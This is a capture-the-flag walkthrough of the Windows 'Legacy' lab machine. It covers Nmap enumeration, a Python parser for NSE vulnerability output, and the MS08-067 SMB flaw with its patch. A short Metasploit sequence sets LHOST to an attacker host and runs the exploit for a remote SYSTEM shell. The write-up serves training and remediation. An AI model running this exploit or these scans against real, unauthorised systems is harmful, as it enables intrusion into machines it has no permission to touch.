Hands-On Windows SMB Exploitation: Unleashing the Legacy CTF Challenge
Legacy
Legacy is a fairly straightforward beginner-level machine which demonstrates the potential security risks of SMB on Windows.
Service Enumeration
Behind Security performed an Nmap service and script scan against 10.10.10.4 and identified that TCP ports 135, 139, and 445 are open.
Command: nmap -sV -sC -T4 10.10.10.4 -v -Pn
Note the -Pn flag: it skips host discovery, so Nmap treats the host as up and scans it regardless. This is necessary here because the target does not respond to ICMP echo requests and would otherwise be reported as down.
SMB Enumeration
Behind Security then ran an Nmap scan using the vulnerability-detection scripts from the NSE (Nmap Scripting Engine) against the three open ports. The command used was: nmap -sV --script=vuln -T4 10.10.10.4 -p135,139,445 -v -Pn, and the results are provided below.
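As an added example (not part of the original write-up), the following Python parser turns the output of the --script=vuln scan above into structured findings, so that only scripts reporting "State: VULNERABLE" end up on the remediation list. The embedded sample is constructed to mimic the layout of nmap's smb-vuln-* scripts and is not the real scan output from the write-up.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the layout of nmap's smb-vuln-* NSE scripts (not real scan output).
SAMPLE_NSE_OUTPUT = """\
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|_    IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
"""

SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

@dataclass
class Finding:
    script: str
    title: str = ""
    state: str = "NOT_VULNERABLE"   # overwritten by a "State:" line when present
    cves: list = field(default_factory=list)

def parse_vuln_output(text: str) -> list:
    """Turn NSE smb-vuln-* output into one Finding per script."""
    findings, current, expect_title = [], None, False
    for raw in text.splitlines():
        m = SCRIPT_RE.match(raw)
        if m:
            current = Finding(script=m.group(1))
            findings.append(current)
            # a one-line result ("false", an NT_STATUS error) has no detail block
            expect_title = m.group(2) == ""
            continue
        if current is None or not raw.startswith("|"):
            continue
        body = raw.lstrip("|_ ")
        if expect_title and body and body != "VULNERABLE:":
            current.title = body          # first line after VULNERABLE: names the bug
            expect_title = False
        elif body.startswith("State:"):
            current.state = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):
            current.cves.extend(CVE_RE.findall(body))
    return findings

def vulnerable(findings: list) -> list:
    # only scripts that reported State: VULNERABLE need patching
    return [f for f in findings if f.state.startswith("VULNERABLE")]
```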
Initial Access – Remote Code Execution (CVE-2008-4250)
Vulnerability Explanation: The vulnerability allows remote code execution when an affected system receives a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker can exploit it without authentication to run arbitrary code, which also makes it usable in a wormable exploit. The issue was assigned CVE-2008-4250 and is covered by Microsoft security bulletin MS08-067.
Vulnerability Fix: Microsoft has released a patch (MS08-067) that fixes this issue; applying it, or decommissioning the unsupported operating system, removes the vulnerability.
Severity: Critical
Steps to Reproduce the Attack: A Metasploit module for this vulnerability is publicly available.
msf6> use exploit/windows/smb/ms08_067_netapi
msf6> set RHOSTS 10.10.10.4
msf6> set LHOST attacker-ip
msf6> set TARGET 6
msf6> run
Post-Exploitation
The SMB (Server) service runs as SYSTEM, so a successful exploit gives the remote attacker SYSTEM-level, i.e. full administrative, privileges on the machine without any further privilege escalation.